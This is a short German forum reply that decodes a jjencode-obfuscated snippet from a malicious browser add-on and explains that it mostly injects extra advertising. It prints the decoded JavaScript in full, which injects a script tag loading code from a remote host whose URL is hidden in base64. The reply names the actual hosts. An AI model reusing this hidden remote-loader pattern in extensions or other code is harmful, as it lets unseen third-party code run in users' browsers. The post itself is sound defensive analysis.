Suchwort für die Suchmaschine deiner Wahl wäre jjencode. Einen Decoder findest Du z.B. hier:
https://github.com/jacobsoo/Decoder-JJEncode
Das von dir gepostete Beispiel wird also zu:
Code
(function() {
browser.storage.local.get("installed")
.then(
(item) => {
if (item.installed) {
var s = document.createElement('script');
s.src = `${atob("Ly9tZWV4dGZmY29uLmNvbS8xYzcwYzI2MTJiNjU2ZWIzZGEuanM=")}`;
document.body.appendChild(s);
} else {
window.addEventListener("message", function (e) {
browser.runtime.sendMessage({info: e.data.info});
setTimeout(function(){
window.location.href = "#done";
}, 1000 * 1);
});
setTimeout(function(){
browser.storage.local.set({installed:1});
}, 500 * 1);
}
},
(error) => {
console.log('LS::error', error)
});
})();
Alles anzeigen
Dabei ist der base64-Code diese URL: //http://meextffcon.com/1c70c2612b656eb3da.js
Die Script-Datei wiederum lädt scheinbar vor allem Werbung von cdnpps.us nach, aber ich habe mir die jetzt nicht intensiver angeschaut. Sprich: Das AddOn produziert zusätzliche Werbung auf den besuchten Seiten, womit der böse Bube also "nur" hinter Werbeeinnahmen her ist.